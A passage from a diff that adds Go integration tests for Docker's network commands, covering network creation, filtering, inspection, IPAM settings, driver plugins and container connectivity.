+	dockerCmd(c, "network", "create", "--subnet=192.168.10.0/24", "--gateway=192.168.10.1", "-o", "com.docker.network.bridge.host_binding_ipv4=192.168.10.1", "testbind")
+	assertNwIsAvailable(c, "testbind")
+
+	out, _ := runSleepingContainer(c, "--net=testbind", "-p", "5000:5000")
+	id := strings.TrimSpace(out)
+	c.Assert(waitRun(id), checker.IsNil)
+	out, _ = dockerCmd(c, "ps")
+	c.Assert(out, checker.Contains, "192.168.10.1:5000->5000/tcp")
+}
+
+func (s *DockerNetworkSuite) TestDockerNetworkRmPredefined(c *check.C) {
+	predefined := []string{"bridge", "host", "none", "default"}
+	for _, net := range predefined {
+		// predefined networks can't be removed
+		out, _, err := dockerCmdWithError("network", "rm", net)
+		c.Assert(err, checker.NotNil, check.Commentf("%v", out))
+	}
+}
+
+func (s *DockerNetworkSuite) TestDockerNetworkLsFilter(c *check.C) {
+	testNet := "testnet1"
+	testLabel := "foo"
+	testValue := "bar"
+	out, _ := dockerCmd(c, "network", "create", "dev")
+	defer func() {
+		dockerCmd(c, "network", "rm", "dev")
+		dockerCmd(c, "network", "rm", testNet)
+	}()
+	networkID := strings.TrimSpace(out)
+
+	// filter with partial ID
+	// only show 'dev' network
+	out, _ = dockerCmd(c, "network", "ls", "-f", "id="+networkID[0:5])
+	assertNwList(c, out, []string{"dev"})
+
+	out, _ = dockerCmd(c, "network", "ls", "-f", "name=dge")
+	assertNwList(c, out, []string{"bridge"})
+
+	// only show built-in network (bridge, none, host)
+	out, _ = dockerCmd(c, "network", "ls", "-f", "type=builtin")
+	assertNwList(c, out, []string{"bridge", "host", "none"})
+
+	// only show custom networks (dev)
+	out, _ = dockerCmd(c, "network", "ls", "-f", "type=custom")
+	assertNwList(c, out, []string{"dev"})
+
+	// show all networks with filter
+	// it should be equivalent of ls without option
+	out, _ = dockerCmd(c, "network", "ls", "-f", "type=custom", "-f", "type=builtin")
+	assertNwList(c, out, []string{"bridge", "dev", "host", "none"})
+
+	out, _ = dockerCmd(c, "network", "create", "--label", testLabel+"="+testValue, testNet)
+	assertNwIsAvailable(c, testNet)
+
+	out, _ = dockerCmd(c, "network", "ls", "-f", "label="+testLabel)
+	assertNwList(c, out, []string{testNet})
+
+	out, _ = dockerCmd(c, "network", "ls", "-f", "label="+testLabel+"="+testValue)
+	assertNwList(c, out, []string{testNet})
+
+	out, _ = dockerCmd(c, "network", "ls", "-f", "label=nonexistent")
+	outArr := strings.Split(strings.TrimSpace(out), "\n")
+	c.Assert(len(outArr), check.Equals, 1, check.Commentf("%s\n", out))
+
+	out, _ = dockerCmd(c, "network", "ls", "-f", "driver=null")
+	assertNwList(c, out, []string{"none"})
+
+	out, _ = dockerCmd(c, "network", "ls", "-f", "driver=host")
+	assertNwList(c, out, []string{"host"})
+
+	out, _ = dockerCmd(c, "network", "ls", "-f", "driver=bridge")
+	assertNwList(c, out, []string{"bridge", "dev", testNet})
+}
+
+func (s *DockerNetworkSuite) TestDockerNetworkCreateDelete(c *check.C) {
+	dockerCmd(c, "network", "create", "test")
+	assertNwIsAvailable(c, "test")
+
+	dockerCmd(c, "network", "rm", "test")
+	assertNwNotAvailable(c, "test")
+}
+
+func (s *DockerNetworkSuite) TestDockerNetworkCreateLabel(c *check.C) {
+	testNet := "testnetcreatelabel"
+	testLabel := "foo"
+	testValue := "bar"
+
+	dockerCmd(c, "network", "create", "--label", testLabel+"="+testValue, testNet)
+	assertNwIsAvailable(c, testNet)
+
+	out, _, err := dockerCmdWithError("network", "inspect", "--format={{ .Labels."+testLabel+" }}", testNet)
+	c.Assert(err, check.IsNil)
+	c.Assert(strings.TrimSpace(out), check.Equals, testValue)
+
+	dockerCmd(c, "network", "rm", testNet)
+	assertNwNotAvailable(c, testNet)
+}
+
+func (s *DockerSuite) TestDockerNetworkDeleteNotExists(c *check.C) {
+	out, _, err := dockerCmdWithError("network", "rm", "test")
+	c.Assert(err, checker.NotNil, check.Commentf("%v", out))
+}
+
+func (s *DockerSuite) TestDockerNetworkDeleteMultiple(c *check.C) {
+	dockerCmd(c, "network", "create", "testDelMulti0")
+	assertNwIsAvailable(c, "testDelMulti0")
+	dockerCmd(c, "network", "create", "testDelMulti1")
+	assertNwIsAvailable(c, "testDelMulti1")
+	dockerCmd(c, "network", "create", "testDelMulti2")
+	assertNwIsAvailable(c, "testDelMulti2")
+	out, _ := dockerCmd(c, "run", "-d", "--net", "testDelMulti2", "busybox", "top")
+	containerID := strings.TrimSpace(out)
+	waitRun(containerID)
+
+	// delete three networks at the same time, since testDelMulti2
+	// contains active container, its deletion should fail.
+	out, _, err := dockerCmdWithError("network", "rm", "testDelMulti0", "testDelMulti1", "testDelMulti2")
+	// err should not be nil due to deleting testDelMulti2 failed.
+	c.Assert(err, checker.NotNil, check.Commentf("out: %s", out))
+	// testDelMulti2 should fail due to network has active endpoints
+	c.Assert(out, checker.Contains, "has active endpoints")
+	assertNwNotAvailable(c, "testDelMulti0")
+	assertNwNotAvailable(c, "testDelMulti1")
+	// testDelMulti2 can't be deleted, so it should exist
+	assertNwIsAvailable(c, "testDelMulti2")
+}
+
+func (s *DockerSuite) TestDockerNetworkInspect(c *check.C) {
+	out, _ := dockerCmd(c, "network", "inspect", "host")
+	networkResources := []types.NetworkResource{}
+	err := json.Unmarshal([]byte(out), &networkResources)
+	c.Assert(err, check.IsNil)
+	c.Assert(networkResources, checker.HasLen, 1)
+
+	out, _ = dockerCmd(c, "network", "inspect", "--format={{ .Name }}", "host")
+	c.Assert(strings.TrimSpace(out), check.Equals, "host")
+}
+
+func (s *DockerSuite) TestDockerNetworkInspectWithID(c *check.C) {
+	out, _ := dockerCmd(c, "network", "create", "test2")
+	networkID := strings.TrimSpace(out)
+	assertNwIsAvailable(c, "test2")
+	out, _ = dockerCmd(c, "network", "inspect", "--format={{ .Id }}", "test2")
+	c.Assert(strings.TrimSpace(out), check.Equals, networkID)
+
+	out, _ = dockerCmd(c, "network", "inspect", "--format={{ .ID }}", "test2")
+	c.Assert(strings.TrimSpace(out), check.Equals, networkID)
+}
+
+func (s *DockerSuite) TestDockerInspectMultipleNetwork(c *check.C) {
+	result := dockerCmdWithResult("network", "inspect", "host", "none")
+	c.Assert(result, icmd.Matches, icmd.Success)
+
+	networkResources := []types.NetworkResource{}
+	err := json.Unmarshal([]byte(result.Stdout()), &networkResources)
+	c.Assert(err, check.IsNil)
+	c.Assert(networkResources, checker.HasLen, 2)
+
+	// Should print an error, return an exitCode 1 *but* should print the host network
+	result = dockerCmdWithResult("network", "inspect", "host", "nonexistent")
+	c.Assert(result, icmd.Matches, icmd.Expected{
+		ExitCode: 1,
+		Err:      "Error: No such network: nonexistent",
+		Out:      "host",
+	})
+
+	networkResources = []types.NetworkResource{}
+	err = json.Unmarshal([]byte(result.Stdout()), &networkResources)
+	c.Assert(networkResources, checker.HasLen, 1)
+
+	// Should print an error and return an exitCode, nothing else
+	result = dockerCmdWithResult("network", "inspect", "nonexistent")
+	c.Assert(result, icmd.Matches, icmd.Expected{
+		ExitCode: 1,
+		Err:      "Error: No such network: nonexistent",
+		Out:      "[]",
+	})
+}
+
+func (s *DockerSuite) TestDockerInspectNetworkWithContainerName(c *check.C) {
+	dockerCmd(c, "network", "create", "brNetForInspect")
+	assertNwIsAvailable(c, "brNetForInspect")
+	defer func() {
+		dockerCmd(c, "network", "rm", "brNetForInspect")
+		assertNwNotAvailable(c, "brNetForInspect")
+	}()
+
+	out, _ := dockerCmd(c, "run", "-d", "--name", "testNetInspect1", "--net", "brNetForInspect", "busybox", "top")
+	c.Assert(waitRun("testNetInspect1"), check.IsNil)
+	containerID := strings.TrimSpace(out)
+	defer func() {
+		// we don't stop container by name, because we'll rename it later
+		dockerCmd(c, "stop", containerID)
+	}()
+
+	out, _ = dockerCmd(c, "network", "inspect", "brNetForInspect")
+	networkResources := []types.NetworkResource{}
+	err := json.Unmarshal([]byte(out), &networkResources)
+	c.Assert(err, check.IsNil)
+	c.Assert(networkResources, checker.HasLen, 1)
+	container, ok := networkResources[0].Containers[containerID]
+	c.Assert(ok, checker.True)
+	c.Assert(container.Name, checker.Equals, "testNetInspect1")
+
+	// rename container and check docker inspect output update
+	newName := "HappyNewName"
+	dockerCmd(c, "rename", "testNetInspect1", newName)
+
+	// check whether network inspect works properly
+	out, _ = dockerCmd(c, "network", "inspect", "brNetForInspect")
+	newNetRes := []types.NetworkResource{}
+	err = json.Unmarshal([]byte(out), &newNetRes)
+	c.Assert(err, check.IsNil)
+	c.Assert(newNetRes, checker.HasLen, 1)
+	container1, ok := newNetRes[0].Containers[containerID]
+	c.Assert(ok, checker.True)
+	c.Assert(container1.Name, checker.Equals, newName)
+
+}
+
+func (s *DockerNetworkSuite) TestDockerNetworkConnectDisconnect(c *check.C) {
+	dockerCmd(c, "network", "create", "test")
+	assertNwIsAvailable(c, "test")
+	nr := getNwResource(c, "test")
+
+	c.Assert(nr.Name, checker.Equals, "test")
+	c.Assert(len(nr.Containers), checker.Equals, 0)
+
+	// run a container
+	out, _ := dockerCmd(c, "run", "-d", "--name", "test", "busybox", "top")
+	c.Assert(waitRun("test"), check.IsNil)
+	containerID := strings.TrimSpace(out)
+
+	// connect the container to the test network
+	dockerCmd(c, "network", "connect", "test", containerID)
+
+	// inspect the network to make sure container is connected
+	nr = getNetworkResource(c, nr.ID)
+	c.Assert(len(nr.Containers), checker.Equals, 1)
+	c.Assert(nr.Containers[containerID], check.NotNil)
+
+	// check if container IP matches network inspect
+	ip, _, err := net.ParseCIDR(nr.Containers[containerID].IPv4Address)
+	c.Assert(err, check.IsNil)
+	containerIP := findContainerIP(c, "test", "test")
+	c.Assert(ip.String(), checker.Equals, containerIP)
+
+	// disconnect container from the network
+	dockerCmd(c, "network", "disconnect", "test", containerID)
+	nr = getNwResource(c, "test")
+	c.Assert(nr.Name, checker.Equals, "test")
+	c.Assert(len(nr.Containers), checker.Equals, 0)
+
+	// run another container
+	out, _ = dockerCmd(c, "run", "-d", "--net", "test", "--name", "test2", "busybox", "top")
+	c.Assert(waitRun("test2"), check.IsNil)
+	containerID = strings.TrimSpace(out)
+
+	nr = getNwResource(c, "test")
+	c.Assert(nr.Name, checker.Equals, "test")
+	c.Assert(len(nr.Containers), checker.Equals, 1)
+
+	// force disconnect the container to the test network
+	dockerCmd(c, "network", "disconnect", "-f", "test", containerID)
+
+	nr = getNwResource(c, "test")
+	c.Assert(nr.Name, checker.Equals, "test")
+	c.Assert(len(nr.Containers), checker.Equals, 0)
+
+	dockerCmd(c, "network", "rm", "test")
+	assertNwNotAvailable(c, "test")
+}
+
+func (s *DockerNetworkSuite) TestDockerNetworkIPAMMultipleNetworks(c *check.C) {
+	// test0 bridge network
+	dockerCmd(c, "network", "create", "--subnet=192.168.0.0/16", "test1")
+	assertNwIsAvailable(c, "test1")
+
+	// test2 bridge network does not overlap
+	dockerCmd(c, "network", "create", "--subnet=192.169.0.0/16", "test2")
+	assertNwIsAvailable(c, "test2")
+
+	// for networks w/o ipam specified, docker will choose proper non-overlapping subnets
+	dockerCmd(c, "network", "create", "test3")
+	assertNwIsAvailable(c, "test3")
+	dockerCmd(c, "network", "create", "test4")
+	assertNwIsAvailable(c, "test4")
+	dockerCmd(c, "network", "create", "test5")
+	assertNwIsAvailable(c, "test5")
+
+	// test network with multiple subnets
+	// bridge network doesn't support multiple subnets. hence, use a dummy driver that supports
+
+	dockerCmd(c, "network", "create", "-d", dummyNetworkDriver, "--subnet=192.168.0.0/16", "--subnet=192.170.0.0/16", "test6")
+	assertNwIsAvailable(c, "test6")
+
+	// test network with multiple subnets with valid ipam combinations
+	// also check same subnet across networks when the driver supports it.
+	dockerCmd(c, "network", "create", "-d", dummyNetworkDriver,
+		"--subnet=192.168.0.0/16", "--subnet=192.170.0.0/16",
+		"--gateway=192.168.0.100", "--gateway=192.170.0.100",
+		"--ip-range=192.168.1.0/24",
+		"--aux-address", "a=192.168.1.5", "--aux-address", "b=192.168.1.6",
+		"--aux-address", "c=192.170.1.5", "--aux-address", "d=192.170.1.6",
+		"test7")
+	assertNwIsAvailable(c, "test7")
+
+	// cleanup
+	for i := 1; i < 8; i++ {
+		dockerCmd(c, "network", "rm", fmt.Sprintf("test%d", i))
+	}
+}
+
+func (s *DockerNetworkSuite) TestDockerNetworkCustomIPAM(c *check.C) {
+	// Create a bridge network using custom ipam driver
+	dockerCmd(c, "network", "create", "--ipam-driver", dummyIPAMDriver, "br0")
+	assertNwIsAvailable(c, "br0")
+
+	// Verify expected network ipam fields are there
+	nr := getNetworkResource(c, "br0")
+	c.Assert(nr.Driver, checker.Equals, "bridge")
+	c.Assert(nr.IPAM.Driver, checker.Equals, dummyIPAMDriver)
+
+	// remove network and exercise remote ipam driver
+	dockerCmd(c, "network", "rm", "br0")
+	assertNwNotAvailable(c, "br0")
+}
+
+func (s *DockerNetworkSuite) TestDockerNetworkIPAMOptions(c *check.C) {
+	// Create a bridge network using custom ipam driver and options
+	dockerCmd(c, "network", "create", "--ipam-driver", dummyIPAMDriver, "--ipam-opt", "opt1=drv1", "--ipam-opt", "opt2=drv2", "br0")
+	assertNwIsAvailable(c, "br0")
+
+	// Verify expected network ipam options
+	nr := getNetworkResource(c, "br0")
+	opts := nr.IPAM.Options
+	c.Assert(opts["opt1"], checker.Equals, "drv1")
+	c.Assert(opts["opt2"], checker.Equals, "drv2")
+}
+
+func (s *DockerNetworkSuite) TestDockerNetworkInspectDefault(c *check.C) {
+	nr := getNetworkResource(c, "none")
+	c.Assert(nr.Driver, checker.Equals, "null")
+	c.Assert(nr.Scope, checker.Equals, "local")
+	c.Assert(nr.Internal, checker.Equals, false)
+	c.Assert(nr.EnableIPv6, checker.Equals, false)
+	c.Assert(nr.IPAM.Driver, checker.Equals, "default")
+	c.Assert(len(nr.IPAM.Config), checker.Equals, 0)
+
+	nr = getNetworkResource(c, "host")
+	c.Assert(nr.Driver, checker.Equals, "host")
+	c.Assert(nr.Scope, checker.Equals, "local")
+	c.Assert(nr.Internal, checker.Equals, false)
+	c.Assert(nr.EnableIPv6, checker.Equals, false)
+	c.Assert(nr.IPAM.Driver, checker.Equals, "default")
+	c.Assert(len(nr.IPAM.Config), checker.Equals, 0)
+
+	nr = getNetworkResource(c, "bridge")
+	c.Assert(nr.Driver, checker.Equals, "bridge")
+	c.Assert(nr.Scope, checker.Equals, "local")
+	c.Assert(nr.Internal, checker.Equals, false)
+	c.Assert(nr.EnableIPv6, checker.Equals, false)
+	c.Assert(nr.IPAM.Driver, checker.Equals, "default")
+	c.Assert(len(nr.IPAM.Config), checker.Equals, 1)
+	c.Assert(nr.IPAM.Config[0].Subnet, checker.NotNil)
+	c.Assert(nr.IPAM.Config[0].Gateway, checker.NotNil)
+}
+
+func (s *DockerNetworkSuite) TestDockerNetworkInspectCustomUnspecified(c *check.C) {
+	// if unspecified, network subnet will be selected from inside preferred pool
+	dockerCmd(c, "network", "create", "test01")
+	assertNwIsAvailable(c, "test01")
+
+	nr := getNetworkResource(c, "test01")
+	c.Assert(nr.Driver, checker.Equals, "bridge")
+	c.Assert(nr.Scope, checker.Equals, "local")
+	c.Assert(nr.Internal, checker.Equals, false)
+	c.Assert(nr.EnableIPv6, checker.Equals, false)
+	c.Assert(nr.IPAM.Driver, checker.Equals, "default")
+	c.Assert(len(nr.IPAM.Config), checker.Equals, 1)
+	c.Assert(nr.IPAM.Config[0].Subnet, checker.NotNil)
+	c.Assert(nr.IPAM.Config[0].Gateway, checker.NotNil)
+
+	dockerCmd(c, "network", "rm", "test01")
+	assertNwNotAvailable(c, "test01")
+}
+
+func (s *DockerNetworkSuite) TestDockerNetworkInspectCustomSpecified(c *check.C) {
+	dockerCmd(c, "network", "create", "--driver=bridge", "--ipv6", "--subnet=fd80:24e2:f998:72d6::/64", "--subnet=172.28.0.0/16", "--ip-range=172.28.5.0/24", "--gateway=172.28.5.254", "br0")
+	assertNwIsAvailable(c, "br0")
+
+	nr := getNetworkResource(c, "br0")
+	c.Assert(nr.Driver, checker.Equals, "bridge")
+	c.Assert(nr.Scope, checker.Equals, "local")
+	c.Assert(nr.Internal, checker.Equals, false)
+	c.Assert(nr.EnableIPv6, checker.Equals, true)
+	c.Assert(nr.IPAM.Driver, checker.Equals, "default")
+	c.Assert(len(nr.IPAM.Config), checker.Equals, 2)
+	c.Assert(nr.IPAM.Config[0].Subnet, checker.Equals, "172.28.0.0/16")
+	c.Assert(nr.IPAM.Config[0].IPRange, checker.Equals, "172.28.5.0/24")
+	c.Assert(nr.IPAM.Config[0].Gateway, checker.Equals, "172.28.5.254")
+	c.Assert(nr.Internal, checker.False)
+	dockerCmd(c, "network", "rm", "br0")
+	assertNwNotAvailable(c, "test01")
+}
+
+func (s *DockerNetworkSuite) TestDockerNetworkIPAMInvalidCombinations(c *check.C) {
+	// network with ip-range out of subnet range
+	_, _, err := dockerCmdWithError("network", "create", "--subnet=192.168.0.0/16", "--ip-range=192.170.0.0/16", "test")
+	c.Assert(err, check.NotNil)
+
+	// network with multiple gateways for a single subnet
+	_, _, err = dockerCmdWithError("network", "create", "--subnet=192.168.0.0/16", "--gateway=192.168.0.1", "--gateway=192.168.0.2", "test")
+	c.Assert(err, check.NotNil)
+
+	// Multiple overlapping subnets in the same network must fail
+	_, _, err = dockerCmdWithError("network", "create", "--subnet=192.168.0.0/16", "--subnet=192.168.1.0/16", "test")
+	c.Assert(err, check.NotNil)
+
+	// overlapping subnets across networks must fail
+	// create a valid test0 network
+	dockerCmd(c, "network", "create", "--subnet=192.168.0.0/16", "test0")
+	assertNwIsAvailable(c, "test0")
+	// create an overlapping test1 network
+	_, _, err = dockerCmdWithError("network", "create", "--subnet=192.168.128.0/17", "test1")
+	c.Assert(err, check.NotNil)
+	dockerCmd(c, "network", "rm", "test0")
+	assertNwNotAvailable(c, "test0")
+}
+
+func (s *DockerNetworkSuite) TestDockerNetworkDriverOptions(c *check.C) {
+	dockerCmd(c, "network", "create", "-d", dummyNetworkDriver, "-o", "opt1=drv1", "-o", "opt2=drv2", "testopt")
+	assertNwIsAvailable(c, "testopt")
+	gopts := remoteDriverNetworkRequest.Options[netlabel.GenericData]
+	c.Assert(gopts, checker.NotNil)
+	opts, ok := gopts.(map[string]interface{})
+	c.Assert(ok, checker.Equals, true)
+	c.Assert(opts["opt1"], checker.Equals, "drv1")
+	c.Assert(opts["opt2"], checker.Equals, "drv2")
+	dockerCmd(c, "network", "rm", "testopt")
+	assertNwNotAvailable(c, "testopt")
+
+}
+
+func (s *DockerNetworkSuite) TestDockerPluginV2NetworkDriver(c *check.C) {
+	testRequires(c, DaemonIsLinux, IsAmd64, Network)
+
+	var (
+		npName        = "tiborvass/test-docker-netplugin"
+		npTag         = "latest"
+		npNameWithTag = npName + ":" + npTag
+	)
+	_, _, err := dockerCmdWithError("plugin", "install", "--grant-all-permissions", npNameWithTag)
+	c.Assert(err, checker.IsNil)
+
+	out, _, err := dockerCmdWithError("plugin", "ls")
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, npName)
+	c.Assert(out, checker.Contains, npTag)
+	c.Assert(out, checker.Contains, "true")
+
+	dockerCmd(c, "network", "create", "-d", npNameWithTag, "v2net")
+	assertNwIsAvailable(c, "v2net")
+	dockerCmd(c, "network", "rm", "v2net")
+	assertNwNotAvailable(c, "v2net")
+
+}
+
+func (s *DockerDaemonSuite) TestDockerNetworkNoDiscoveryDefaultBridgeNetwork(c *check.C) {
+	testRequires(c, ExecSupport)
+	// On default bridge network built-in service discovery should not happen
+	hostsFile := "/etc/hosts"
+	bridgeName := "external-bridge"
+	bridgeIP := "192.169.255.254/24"
+	out, err := createInterface(c, "bridge", bridgeName, bridgeIP)
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	defer deleteInterface(c, bridgeName)
+
+	err = s.d.StartWithBusybox("--bridge", bridgeName)
+	c.Assert(err, check.IsNil)
+	defer s.d.Restart()
+
+	// run two containers and store first container's etc/hosts content
+	out, err = s.d.Cmd("run", "-d", "busybox", "top")
+	c.Assert(err, check.IsNil)
+	cid1 := strings.TrimSpace(out)
+	defer s.d.Cmd("stop", cid1)
+
+	hosts, err := s.d.Cmd("exec", cid1, "cat", hostsFile)
+	c.Assert(err, checker.IsNil)
+
+	out, err = s.d.Cmd("run", "-d", "--name", "container2", "busybox", "top")
+	c.Assert(err, check.IsNil)
+	cid2 := strings.TrimSpace(out)
+
+	// verify first container's etc/hosts file has not changed after spawning the second named container
+	hostsPost, err := s.d.Cmd("exec", cid1, "cat", hostsFile)
+	c.Assert(err, checker.IsNil)
+	c.Assert(string(hosts), checker.Equals, string(hostsPost),
+		check.Commentf("Unexpected %s change on second container creation", hostsFile))
+
+	// stop container 2 and verify first container's etc/hosts has not changed
+	_, err = s.d.Cmd("stop", cid2)
+	c.Assert(err, check.IsNil)
+
+	hostsPost, err = s.d.Cmd("exec", cid1, "cat", hostsFile)
+	c.Assert(err, checker.IsNil)
+	c.Assert(string(hosts), checker.Equals, string(hostsPost),
+		check.Commentf("Unexpected %s change on second container creation", hostsFile))
+
+	// but discovery is on when connecting to non default bridge network
+	network := "anotherbridge"
+	out, err = s.d.Cmd("network", "create", network)
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	defer s.d.Cmd("network", "rm", network)
+
+	out, err = s.d.Cmd("network", "connect", network, cid1)
+	c.Assert(err, check.IsNil, check.Commentf(out))
+
+	hosts, err = s.d.Cmd("exec", cid1, "cat", hostsFile)
+	c.Assert(err, checker.IsNil)
+
+	hostsPost, err = s.d.Cmd("exec", cid1, "cat", hostsFile)
+	c.Assert(err, checker.IsNil)
+	c.Assert(string(hosts), checker.Equals, string(hostsPost),
+		check.Commentf("Unexpected %s change on second network connection", hostsFile))
+}
+
+func (s *DockerNetworkSuite) TestDockerNetworkAnonymousEndpoint(c *check.C) {
+	testRequires(c, ExecSupport, NotArm)
+	hostsFile := "/etc/hosts"
+	cstmBridgeNw := "custom-bridge-nw"
+	cstmBridgeNw1 := "custom-bridge-nw1"
+
+	dockerCmd(c, "network", "create", "-d", "bridge", cstmBridgeNw)
+	assertNwIsAvailable(c, cstmBridgeNw)
+
+	// run two anonymous containers and store their etc/hosts content
+	out, _ := dockerCmd(c, "run", "-d", "--net", cstmBridgeNw, "busybox", "top")
+	cid1 := strings.TrimSpace(out)
+
+	hosts1, err := readContainerFileWithExec(cid1, hostsFile)
+	c.Assert(err, checker.IsNil)
+
+	out, _ = dockerCmd(c, "run", "-d", "--net", cstmBridgeNw, "busybox", "top")
+	cid2 := strings.TrimSpace(out)
+
+	hosts2, err := readContainerFileWithExec(cid2, hostsFile)
+	c.Assert(err, checker.IsNil)
+
+	// verify first container etc/hosts file has not changed
+	hosts1post, err := readContainerFileWithExec(cid1, hostsFile)
+	c.Assert(err, checker.IsNil)
+	c.Assert(string(hosts1), checker.Equals, string(hosts1post),
+		check.Commentf("Unexpected %s change on anonymous container creation", hostsFile))
+
+	// Connect the 2nd container to a new network and verify the
+	// first container /etc/hosts file still hasn't changed.
+	dockerCmd(c, "network", "create", "-d", "bridge", cstmBridgeNw1)
+	assertNwIsAvailable(c, cstmBridgeNw1)
+
+	dockerCmd(c, "network", "connect", cstmBridgeNw1, cid2)
+
+	hosts2, err = readContainerFileWithExec(cid2, hostsFile)
+	c.Assert(err, checker.IsNil)
+
+	hosts1post, err = readContainerFileWithExec(cid1, hostsFile)
+	c.Assert(err, checker.IsNil)
+	c.Assert(string(hosts1), checker.Equals, string(hosts1post),
+		check.Commentf("Unexpected %s change on container connect", hostsFile))
+
+	// start a named container
+	cName := "AnyName"
+	out, _ = dockerCmd(c, "run", "-d", "--net", cstmBridgeNw, "--name", cName, "busybox", "top")
+	cid3 := strings.TrimSpace(out)
+
+	// verify that container 1 and 2 can ping the named container
+	dockerCmd(c, "exec", cid1, "ping", "-c", "1", cName)
+	dockerCmd(c, "exec", cid2, "ping", "-c", "1", cName)
+
+	// Stop named container and verify first two containers' etc/hosts file hasn't changed
+	dockerCmd(c, "stop", cid3)
+	hosts1post, err = readContainerFileWithExec(cid1, hostsFile)
+	c.Assert(err, checker.IsNil)
+	c.Assert(string(hosts1), checker.Equals, string(hosts1post),
+		check.Commentf("Unexpected %s change on name container creation", hostsFile))
+
+	hosts2post, err := readContainerFileWithExec(cid2, hostsFile)
+	c.Assert(err, checker.IsNil)
+	c.Assert(string(hosts2), checker.Equals, string(hosts2post),
+		check.Commentf("Unexpected %s change on name container creation", hostsFile))
+
+	// verify that container 1 and 2 can't ping the named container now
+	_, _, err = dockerCmdWithError("exec", cid1, "ping", "-c", "1", cName)
+	c.Assert(err, check.NotNil)
+	_, _, err = dockerCmdWithError("exec", cid2, "ping", "-c", "1", cName)
+	c.Assert(err, check.NotNil)
+}
+
+func (s *DockerNetworkSuite) TestDockerNetworkLinkOnDefaultNetworkOnly(c *check.C) {
+	// Legacy Link feature must work only on default network, and not across networks
+	cnt1 := "container1"
+	cnt2 := "container2"
+	network := "anotherbridge"
+
+	// Run first container on default network
+	dockerCmd(c, "run", "-d", "--name", cnt1, "busybox", "top")
+
+	// Create another network and run the second container on it
+	dockerCmd(c, "network", "create", network)
+	assertNwIsAvailable(c, network)
+	dockerCmd(c, "run", "-d", "--net", network, "--name", cnt2, "busybox", "top")
+
+	// Try launching a container on default network, linking to the first container. Must succeed
+	dockerCmd(c, "run", "-d", "--link", fmt.Sprintf("%s:%s", cnt1, cnt1), "busybox", "top")
+
+	// Try launching a container on default network, linking to the second container. Must fail
+	_, _, err := dockerCmdWithError("run", "-d", "--link", fmt.Sprintf("%s:%s", cnt2, cnt2), "busybox", "top")
+	c.Assert(err, checker.NotNil)
+
+	// Connect second container to default network. Now a container on default network can link to it
+	dockerCmd(c, "network", "connect", "bridge", cnt2)
+	dockerCmd(c, "run", "-d", "--link", fmt.Sprintf("%s:%s", cnt2, cnt2), "busybox", "top")
+}
+
+func (s *DockerNetworkSuite) TestDockerNetworkOverlayPortMapping(c *check.C) {
+	// Verify exposed ports are present in ps output when running a container on
+	// a network managed by a driver which does not provide the default gateway
+	// for the container
+	nwn := "ov"
+	ctn := "bb"
+	port1 := 80
+	port2 := 443
+	expose1 := fmt.Sprintf("--expose=%d", port1)
+	expose2 := fmt.Sprintf("--expose=%d", port2)
+
+	dockerCmd(c, "network", "create", "-d", dummyNetworkDriver, nwn)
+	assertNwIsAvailable(c, nwn)
+
+	dockerCmd(c, "run", "-d", "--net", nwn, "--name", ctn, expose1, expose2, "busybox", "top")
+
+	// Check docker ps o/p for last created container reports the unpublished ports
+	unpPort1 := fmt.Sprintf("%d/tcp", port1)
+	unpPort2 := fmt.Sprintf("%d/tcp", port2)
+	out, _ := dockerCmd(c, "ps", "-n=1")
+	// Missing unpublished ports in docker ps output
+	c.Assert(out, checker.Contains, unpPort1)
+	// Missing unpublished ports in docker ps output
+	c.Assert(out, checker.Contains, unpPort2)
+}
+
+func (s *DockerNetworkSuite) TestDockerNetworkDriverUngracefulRestart(c *check.C) {
+	testRequires(c, DaemonIsLinux, NotUserNamespace)
+	dnd := "dnd"
+	did := "did"
+
+	mux := http.NewServeMux()
+	server := httptest.NewServer(mux)
+	setupRemoteNetworkDrivers(c, mux, server.URL, dnd, did)
+
+	s.d.StartWithBusybox()
+	_, err := s.d.Cmd("network", "create", "-d", dnd, "--subnet", "1.1.1.0/24", "net1")
+	c.Assert(err, checker.IsNil)
+
+	_, err = s.d.Cmd("run", "-itd", "--net", "net1", "--name", "foo", "--ip", "1.1.1.10", "busybox", "sh")
+	c.Assert(err, checker.IsNil)
+
+	// Kill daemon and restart
+	if err = s.d.cmd.Process.Kill(); err != nil {
+		c.Fatal(err)
+	}
+
+	server.Close()
+
+	startTime := time.Now().Unix()
+	if err = s.d.Restart(); err != nil {
+		c.Fatal(err)
+	}
+	lapse := time.Now().Unix() - startTime
+	if lapse > 60 {
+		// In normal scenarios, daemon restart takes ~1 second.
+		// Plugin retry mechanism can delay the daemon start. systemd may not like it.
+		// Avoid accessing plugins during daemon bootup
+		c.Logf("daemon restart took too long : %d seconds", lapse)
+	}
+
+	// Restart the custom dummy plugin
+	mux = http.NewServeMux()
+	server = httptest.NewServer(mux)
+	setupRemoteNetworkDrivers(c, mux, server.URL, dnd, did)
+
+	// trying to reuse the same ip must succeed
+	_, err = s.d.Cmd("run", "-itd", "--net", "net1", "--name", "bar", "--ip", "1.1.1.10", "busybox", "sh")
+	c.Assert(err, checker.IsNil)
+}
+
+func (s *DockerNetworkSuite) TestDockerNetworkMacInspect(c *check.C) {
+	// Verify endpoint MAC address is correctly populated in container's network settings
+	nwn := "ov"
+	ctn := "bb"
+
+	dockerCmd(c, "network", "create", "-d", dummyNetworkDriver, nwn)
+	assertNwIsAvailable(c, nwn)
+
+	dockerCmd(c, "run", "-d", "--net", nwn, "--name", ctn, "busybox", "top")
+
+	mac := inspectField(c, ctn, "NetworkSettings.Networks."+nwn+".MacAddress")
+	c.Assert(mac, checker.Equals, "a0:b1:c2:d3:e4:f5")
+}
+
+func (s *DockerSuite) TestInspectAPIMultipleNetworks(c *check.C) {
+	dockerCmd(c, "network", "create", "mybridge1")
+	dockerCmd(c, "network", "create", "mybridge2")
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "top")
+	id := strings.TrimSpace(out)
+	c.Assert(waitRun(id), check.IsNil)
+
+	dockerCmd(c, "network", "connect", "mybridge1", id)
+	dockerCmd(c, "network", "connect", "mybridge2", id)
+
+	body := getInspectBody(c, "v1.20", id)
+	var inspect120 v1p20.ContainerJSON
+	err := json.Unmarshal(body, &inspect120)
+	c.Assert(err, checker.IsNil)
+
+	versionedIP := inspect120.NetworkSettings.IPAddress
+
+	body = getInspectBody(c, "v1.21", id)
+	var inspect121 types.ContainerJSON
